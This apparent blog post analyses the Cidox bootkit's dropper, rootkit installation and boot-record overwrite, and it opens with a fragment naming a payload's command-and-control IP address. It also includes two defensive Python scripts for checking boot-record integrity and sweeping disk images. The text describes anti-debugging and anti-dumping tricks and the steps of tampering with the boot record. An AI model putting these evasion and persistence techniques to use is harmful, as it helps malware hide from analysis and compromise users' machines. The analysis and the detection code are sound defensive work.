<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidP0A794KQB7d8eNwJf2Euc1KzMeuUZPWZ-PrFw-eQM6jCCBv6Aqfka2UEcrLHGeAICTxsqPLB2q03axPNIXwzdch4qPPiRC-nOZj1DFGUOrUaHUragKNyNC2qIxLcX06ef9HIfkVs1lE/s1600/jmptable.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidP0A794KQB7d8eNwJf2Euc1KzMeuUZPWZ-PrFw-eQM6jCCBv6Aqfka2UEcrLHGeAICTxsqPLB2q03axPNIXwzdch4qPPiRC-nOZj1DFGUOrUaHUragKNyNC2qIxLcX06ef9HIfkVs1lE/s320/jmptable.jpg" width="260" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsnuMJEVht1WPZgWLUAZkAg-ghizhQqSfJlNnEdJHXRNu8cRkRCzyi34WkUvf_b8yccOQJ3clK25PftFdeA1yZVmvOf5MDRb1ZoG2IlbUy8eiRqRyX3_jwTC6u_qTdGriXlKLUKMFSKSA/s1600/jmpeax.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="93" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsnuMJEVht1WPZgWLUAZkAg-ghizhQqSfJlNnEdJHXRNu8cRkRCzyi34WkUvf_b8yccOQJ3clK25PftFdeA1yZVmvOf5MDRb1ZoG2IlbUy8eiRqRyX3_jwTC6u_qTdGriXlKLUKMFSKSA/s320/jmpeax.jpg" width="320" /></a></div>
<div style="text-align: center;">
<i>Jump table for calling API</i></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
While the characteristics described so far are trivial, the main purpose of this payload is to connect to a remote server that can be used, or is already being used, for <b><i>targeted attacks</i></b>. It connects and listens to the remote IP address <b><i>111.68.9.93</i></b>.</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilGBFa6IUcYy8HQQYZfCxdsyIit1iovnqnmS7E-7xb5LwglHYFEpzxaMk23nL0axFKdlbNUElpxVfBfAeAqaYKH6QBa4x0Ez6SKhuv-vQeNdmCHMCn0ux-2Yd36LY5lbDe-YzJTtuXYTs/s1600/connect111.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilGBFa6IUcYy8HQQYZfCxdsyIit1iovnqnmS7E-7xb5LwglHYFEpzxaMk23nL0axFKdlbNUElpxVfBfAeAqaYKH6QBa4x0Ez6SKhuv-vQeNdmCHMCn0ux-2Yd36LY5lbDe-YzJTtuXYTs/s400/connect111.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVYQSHVDUPw5rwbmGbRDtmZPF6I5GlViXqHUWm18L0FcYBYf1m_jreVRFOVI07gu8aYylyAEzFlvhLYErLm-gaTW1LGY3mQuH5v8_uwyInxZCDSPG_VPxuvx2-L96_1-crojc4TLaFrTQ/s1600/connect.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVYQSHVDUPw5rwbmGbRDtmZPF6I5GlViXqHUWm18L0FcYBYf1m_jreVRFOVI07gu8aYylyAEzFlvhLYErLm-gaTW1LGY3mQuH5v8_uwyInxZCDSPG_VPxuvx2-L96_1-crojc4TLaFrTQ/s400/connect.jpg" width="400" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: center;">
<i>Connects to a remote server</i></div>
CIDOX Bootkit (posted 2013-11-11)<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">The use of bootkits has grown in recent years, and they have become an annoyance and a source of frustration for many computer users. A bootkit, strictly speaking, is a set of programs that loads itself before the operating system does. This gives it a flexible means to hide its activities or to modify key components that are not normally accessible. By modifying the initial boot loader of the hard drive it can bypass detection by most traditional AV products and perform kernel-level operations not normally available to user-level programs. Because of this, bootkits are generally hard to remove, as they require extensive study of how to restore the original MBR or partition.</span></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">Such
is the case of Cidox.</span></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;">
<span style="font-family: Times,"Times New Roman",serif;"><br /></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">This malware initially arrives as a single downloaded executable file, whether via <i style="mso-bidi-font-style: normal;">drive-by-download</i>, exploits or any other possible means. It carries within itself the vital components needed to infiltrate and compromise the system. Excluding the dropper, its tools are the boot loader (bootkit), the rootkit drivers (w32/w64), a shutdown file and the attribute modifier.</span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDrlJtM0VTSZuZFe6xWnkAqAzxAjcKhBQmCnmg32j34bGr6Jj_K5rnrXcUYCzB5RTNdmyT5SoJyhfAVAduVHphtkqOpV9X82iPhM_k8En6hLmvCP0Tpqmkr9nA34Wzu6-JKxSkWIUSqvs/s1600/all.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDrlJtM0VTSZuZFe6xWnkAqAzxAjcKhBQmCnmg32j34bGr6Jj_K5rnrXcUYCzB5RTNdmyT5SoJyhfAVAduVHphtkqOpV9X82iPhM_k8En6hLmvCP0Tpqmkr9nA34Wzu6-JKxSkWIUSqvs/s400/all.jpg" width="400" /></a></div>
<div style="text-align: center;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"><i> Cidox in the middle</i></span></span></div>
</div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><br /></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">The main purpose of this malware is to intercept, modify and gather information on the search requests made by the unsuspecting user. By modifying the volume boot record of an NTFS drive, it loads its rootkit, which in turn loads and sets up a library that monitors specific browsers and redirects their queries to a remote location. It has the capability to modify a webpage as seen by users in their browsers. It has also been reported that it uses the said technique to hold the system to ransom, tricking the user into believing that they need to pay a monetary amount to remove an infection on their system.</span></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;">
<span style="font-family: Times,"Times New Roman",serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipN3df7QMnNmbn5bFFcYecPozlXoNkqrPgqnmisiNJS8bzA-4MzOWcT9cSyaKgYZhiffDCkIziuGjqmGaY2sC0omYYaYaVpBPDWC1SGgtVhoukDGD2Prf8S7rcFdtj6IiMCuloM5Qjd48/s1600/browsers.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipN3df7QMnNmbn5bFFcYecPozlXoNkqrPgqnmisiNJS8bzA-4MzOWcT9cSyaKgYZhiffDCkIziuGjqmGaY2sC0omYYaYaVpBPDWC1SGgtVhoukDGD2Prf8S7rcFdtj6IiMCuloM5Qjd48/s320/browsers.jpg" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-family: Times,"Times New Roman",serif;">Browsers monitored by Cidox</span></i></div>
<br />
<span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">The
following section describes in technical detail what each Cidox component does. </span></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;">
<span style="font-family: Times,"Times New Roman",serif;"><br /></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;">
<span style="font-family: Times,"Times New Roman",serif;"><br /></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">DROPPER</span></b></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><br /></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">Upon execution, it performs the following actions to install the components, in this order:</span></span></div>
<ul>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">Check the Windows version</span></span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">Copy the w32 or w64 version of the rootkit into memory</span></span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">Write it directly to the hard drive</span></span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">Modify the boot loader of the hard drive to load the written rootkit</span></span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">Create and execute a small file to force a restart of the system</span></span></li>
<li><span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: "Times New Roman"; mso-fareast-language: EN-US;">Modify attributes and delete itself</span></span></li>
</ul>
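The dropper writes the rootkit to raw sectors and then re-points the NTFS volume boot record (VBR) at it, which is the same modification the earlier paragraph describes. The practical consequence for a defender is that the VBR keeps a valid BIOS parameter block, so the volume still mounts and filesystem-level checks pass; only the bootstrap code area (offsets 0x54 to 0x1FE of the boot sector) changes. An integrity check therefore has to compare that code area against a baseline taken from a clean system rather than merely validate the BPB. The Python below is an added example, not Cidox's or the post's code: it builds a constructed minimal NTFS boot sector (all field values made up), baselines the bootstrap code area, simulates a bootkit-style patch that leaves the BPB intact, and reports deviations.

```python
"""Added example: NTFS volume boot record (VBR) integrity check against a
clean baseline. The boot sector built here is constructed for illustration
and is not a real volume's VBR."""
import hashlib
import struct

SECTOR_SIZE = 512
BOOTSTRAP_OFFSET = 0x54   # bootstrap code follows the extended BPB
SIGNATURE_OFFSET = 0x1FE  # 0x55AA boot signature
NTFS_OEM_ID = b"NTFS    "


def build_sample_vbr(code_fill=0x90):
    """Build a minimal, constructed NTFS boot sector with a valid BPB."""
    vbr = bytearray(SECTOR_SIZE)
    vbr[0:3] = b"\xeb\x52\x90"                    # jmp short + nop, as on real NTFS volumes
    vbr[3:11] = NTFS_OEM_ID
    struct.pack_into("<H", vbr, 0x0B, 512)        # bytes per sector
    vbr[0x0D] = 8                                 # sectors per cluster
    vbr[0x15] = 0xF8                              # media descriptor: fixed disk
    struct.pack_into("<Q", vbr, 0x28, 0x1FFFFF)   # total sectors (made-up)
    struct.pack_into("<Q", vbr, 0x30, 0x0C0000)   # $MFT start cluster (made-up)
    struct.pack_into("<Q", vbr, 0x38, 0x000002)   # $MFTMirr start cluster (made-up)
    code_len = SIGNATURE_OFFSET - BOOTSTRAP_OFFSET
    vbr[BOOTSTRAP_OFFSET:SIGNATURE_OFFSET] = bytes([code_fill]) * code_len
    vbr[SIGNATURE_OFFSET:SECTOR_SIZE] = b"\x55\xaa"
    return bytes(vbr)


def bootstrap_hash(vbr):
    """SHA-256 of the bootstrap code area only; store this from a clean system."""
    return hashlib.sha256(vbr[BOOTSTRAP_OFFSET:SIGNATURE_OFFSET]).hexdigest()


def check_vbr(vbr, baseline_hash):
    """Return a list of findings; an empty list means the VBR matches the baseline."""
    findings = []
    if len(vbr) != SECTOR_SIZE:
        return ["unexpected sector length %d" % len(vbr)]
    if vbr[SIGNATURE_OFFSET:SECTOR_SIZE] != b"\x55\xaa":
        findings.append("missing 0x55AA boot signature")
    if vbr[3:11] != NTFS_OEM_ID:
        findings.append("OEM ID is not NTFS")
    bytes_per_sector = struct.unpack_from("<H", vbr, 0x0B)[0]
    if bytes_per_sector not in (512, 1024, 2048, 4096):
        findings.append("implausible bytes-per-sector value %d" % bytes_per_sector)
    if vbr[0x15] != 0xF8:
        findings.append("unexpected media descriptor 0x%02x" % vbr[0x15])
    # The BPB checks above pass on a bootkit-modified VBR; only the code-area
    # baseline comparison catches the redirected boot loader.
    if bootstrap_hash(vbr) != baseline_hash:
        findings.append("bootstrap code differs from baseline")
    return findings


def simulate_bootkit_patch(vbr):
    """Constructed tampering: overwrite the start of the bootstrap code while
    leaving the BPB intact, the shape of change that keeps the volume mountable."""
    patched = bytearray(vbr)
    patch = b"PATCHED!"   # placeholder bytes, not real bootkit code
    patched[BOOTSTRAP_OFFSET:BOOTSTRAP_OFFSET + len(patch)] = patch
    return bytes(patched)


if __name__ == "__main__":
    clean = build_sample_vbr()
    baseline = bootstrap_hash(clean)
    print("clean:  ", check_vbr(clean, baseline))
    print("patched:", check_vbr(simulate_bootkit_patch(clean), baseline))
```

On a live system the same check would read the first sector of the volume from the raw device and compare it with a baseline hash kept off-box, since a rootkit that hooks disk reads (as the post describes Cidox doing after reboot) can hand back the original sector to any tool running under the infected OS; reading from boot media or an offline image avoids that.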
<span style="font-family: Times,"Times New Roman",serif;"></span>
<span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Times,"Times New Roman",serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmA4oVXsSmxSy1rHv9XNn4limnYaauJ5ZMT4wMQF8Rt_xunUwwJ14wgjarJmTByhEuC4hS4uQHrJUG3B4n7q85qKX_ALT3KiXNAJ3nzE89PNTDdwPeIO7IdbNdYQJeLHqxRzqJKU5W2i8/s1600/flow.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmA4oVXsSmxSy1rHv9XNn4limnYaauJ5ZMT4wMQF8Rt_xunUwwJ14wgjarJmTByhEuC4hS4uQHrJUG3B4n7q85qKX_ALT3KiXNAJ3nzE89PNTDdwPeIO7IdbNdYQJeLHqxRzqJKU5W2i8/s320/flow.jpg" width="320" /></a></span></div>
<div style="text-align: center;">
<i>Overview of dropper</i></div>
<br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">This executable employs anti-debugging tricks to avoid being emulated and analyzed. For one, it uses the classic large, almost infinite loop that does nothing; most emulators give up on such loops because of engine performance constraints. In conjunction with this trick, it uses the GetTickCount API to determine whether it is being debugged and, if so, overwrites the first few bytes of its main function so that execution will not continue. This can easily be defeated by bypassing the code or modifying the registers. </span></span></div>
<span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Times,"Times New Roman",serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlGqDhGhq4zQU-Znvke_L9xmjZrM5w2gTzjE6PpR98lnETgFJXBOErebiALrrw03iPrIvR0Vpz-_vThDsmhbIfyJ8FKjy1p3jOJzZGnbBjoXiGfQ5OU32NzwRXs-tILCTGgD7Vk_bElhs/s1600/antidebug1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlGqDhGhq4zQU-Znvke_L9xmjZrM5w2gTzjE6PpR98lnETgFJXBOErebiALrrw03iPrIvR0Vpz-_vThDsmhbIfyJ8FKjy1p3jOJzZGnbBjoXiGfQ5OU32NzwRXs-tILCTGgD7Vk_bElhs/s400/antidebug1.jpg" width="400" /> </a></span></div>
<div style="text-align: center;">
<i><span style="font-family: Times,"Times New Roman",serif;">Overwriting of function if it assumes it is being debugged</span></i></div>
<br />
<span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style>
<![endif]-->
<br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">Instead
of directly decrypting parts of itself, the dropper allocates memory multiple
times, decrypts a portion into each allocation and transfers execution into it. It
evidently uses this jumping technique to make it harder for third-party tools to
dump Cidox from memory.</span></span></div>
<span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Times,"Times New Roman",serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRvpeyxlavbjPwAcfL_p8sgUHogt2hXY-JZexsMI3X49nsypF3G6DqV5kzH030Yj__1W-2-cKvSRzl2U8lsvE8mgAHvIgkdUi-jPUZraFzu10fKmQMYOX5LHKJBmAXYBMpsyiZ9tvQN6E/s1600/allocatedxfer.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRvpeyxlavbjPwAcfL_p8sgUHogt2hXY-JZexsMI3X49nsypF3G6DqV5kzH030Yj__1W-2-cKvSRzl2U8lsvE8mgAHvIgkdUi-jPUZraFzu10fKmQMYOX5LHKJBmAXYBMpsyiZ9tvQN6E/s400/allocatedxfer.jpg" width="400" /></a></span></div>
<div style="text-align: center;">
<i><span style="font-family: Times,"Times New Roman",serif;">Passing of execution</span></i></div>
<br />
<span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: small;">Cidox carries two versions of its rootkit driver within itself and chooses one of them depending on the Windows version of the infected system. It performs some checks to verify whether the platform is 32-bit or 64-bit, saves the result in a memory location, and then "drops" the file by writing it directly to a free sector of the hard disk.</span></span><br />
<span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<br />
<div style="text-align: center;">
<span style="font-family: Times,"Times New Roman",serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbZQ9Txbm9n-0FYU4YA0eNZdDu22mVcncIfgmS3avewSxgXHKNFhgTJBW6Eb7JQWeDghRy6Urf1kAtY3jZ8uIKdt-aADSioMkHDYMu7ZsYCpjbby2MK-BFE365q_OR7XBZ6u6D-dHGJgY/s1600/rootkitwritten.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbZQ9Txbm9n-0FYU4YA0eNZdDu22mVcncIfgmS3avewSxgXHKNFhgTJBW6Eb7JQWeDghRy6Urf1kAtY3jZ8uIKdt-aADSioMkHDYMu7ZsYCpjbby2MK-BFE365q_OR7XBZ6u6D-dHGJgY/s400/rootkitwritten.jpg" width="400" /></a></span></div>
<div style="text-align: center;">
<span style="font-family: Times,"Times New Roman",serif;"><i>Rootkit driver written to a free sector</i></span>
<br />
</div>
<br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">At
this point it prepares to write directly to the hard disk by mounting it. It
saves the original volume boot sector to a random sector of the first disk, then
writes the malicious boot loader directly over it. </span></span></div>
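The two disk-level artefacts described above, the rootkit driver written to a free sector and the original boot sector stashed in a random sector before the malicious loader overwrites it, are what a forensic sweep of unallocated space can look for. The Python below is an added example written for this post, not Cidox's code or code from the original article: it builds a tiny synthetic MBR disk image inline (one NTFS partition, with both artefacts planted in unallocated sectors), parses the partition table, and reports free sectors that start a PE image or that look like a copied NTFS boot sector. The layout and sector numbers of the sample image are constructed assumptions; on a real case the same functions would be run over an acquired raw image instead.

```python
"""Sweep the unallocated sectors of a raw MBR disk image for two bootkit
artefacts: a PE image (a driver dropped into a free sector) and a stray copy
of an NTFS volume boot record (the original VBR saved before it was replaced).

Added example for this post; not Cidox's code. The disk image below is a
small synthetic one built inline so the script runs offline."""
import struct

SECTOR = 512


def mbr_partitions(image):
    """Return (start_lba, sector_count) for each used entry of the MBR table."""
    parts = []
    for i in range(4):
        off = 446 + 16 * i          # partition table starts at offset 446
        entry = image[off:off + 16]
        ptype = entry[4]
        start, count = struct.unpack_from("<II", entry, 8)
        if ptype != 0 and count != 0:
            parts.append((start, count))
    return parts


def unallocated_sectors(image):
    """Yield LBAs not covered by any partition; the MBR itself (LBA 0) is skipped."""
    total = len(image) // SECTOR
    parts = mbr_partitions(image)
    for lba in range(1, total):
        if not any(s <= lba < s + c for s, c in parts):
            yield lba


def looks_like_pe(sector):
    """True if the sector starts with an MZ header whose e_lfanew points at
    a 'PE\\0\\0' signature inside the same sector (deliberately strict)."""
    if sector[:2] != b"MZ" or len(sector) < 0x40:
        return False
    e_lfanew = struct.unpack_from("<I", sector, 0x3C)[0]
    return e_lfanew + 4 <= len(sector) and sector[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def looks_like_vbr(sector):
    """True if the sector carries an NTFS OEM ID and the 0x55AA boot signature."""
    return sector[3:7] == b"NTFS" and sector[510:512] == b"\x55\xAA"


def scan_free_space(image):
    """Return {'pe': [lba, ...], 'vbr_copy': [lba, ...]} for suspicious free sectors."""
    found = {"pe": [], "vbr_copy": []}
    for lba in unallocated_sectors(image):
        sec = image[lba * SECTOR:(lba + 1) * SECTOR]
        if looks_like_pe(sec):
            found["pe"].append(lba)
        elif looks_like_vbr(sec):
            found["vbr_copy"].append(lba)
    return found


def build_sample_image():
    """Constructed 64 KiB image: one NTFS partition plus two planted artefacts."""
    img = bytearray(128 * SECTOR)
    # MBR: partition entry 0, type 0x07 (NTFS), LBA 64, 32 sectors long
    img[446 + 4] = 0x07
    struct.pack_into("<II", img, 446 + 8, 64, 32)
    img[510:512] = b"\x55\xAA"
    # the partition's genuine VBR at LBA 64 (inside the partition, not scanned)
    vbr = bytearray(SECTOR)
    vbr[0:3] = b"\xEB\x52\x90"
    vbr[3:11] = b"NTFS    "
    vbr[510:512] = b"\x55\xAA"
    img[64 * SECTOR:65 * SECTOR] = vbr
    # artefact 1: copy of the original VBR stashed in a free sector (LBA 100)
    img[100 * SECTOR:101 * SECTOR] = vbr
    # artefact 2: minimal PE header dropped into the gap before the partition (LBA 17)
    pe = bytearray(SECTOR)
    pe[0:2] = b"MZ"
    struct.pack_into("<I", pe, 0x3C, 0x80)   # e_lfanew
    pe[0x80:0x84] = b"PE\0\0"
    img[17 * SECTOR:18 * SECTOR] = pe
    return bytes(img)


if __name__ == "__main__":
    print(scan_free_space(build_sample_image()))
```

The PE check is kept strict (an MZ stub whose e_lfanew lands on the PE signature within the same sector) to keep false positives low on real images, where free space is full of stale data. A fuller sweep would carve the whole image forward from each PE hit for analysis, and would compare the live VBR with any copy found to confirm which one is the original.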
<span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Times,"Times New Roman",serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0RV5QK2oavV1yef2ztgb8CFZj_qlG1MoK-BftD5bQViEPMAdQfL0EM4bMWKDgGxtPNTiW8m8nz3wlo2EfgRzDxHLUpmWgLsly1CQvY1vjPzTLXjhrWkwRdNv30_S-Q8zcH33gh8HG0Q0/s1600/hardrive0.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0RV5QK2oavV1yef2ztgb8CFZj_qlG1MoK-BftD5bQViEPMAdQfL0EM4bMWKDgGxtPNTiW8m8nz3wlo2EfgRzDxHLUpmWgLsly1CQvY1vjPzTLXjhrWkwRdNv30_S-Q8zcH33gh8HG0Q0/s400/hardrive0.jpg" width="400" /></a></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<div style="text-align: center;">
<i>Uses ZwCreateFile to mount and read/write directly to hard disk</i></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">Finally, it creates and executes a small file whose sole purpose is to force a
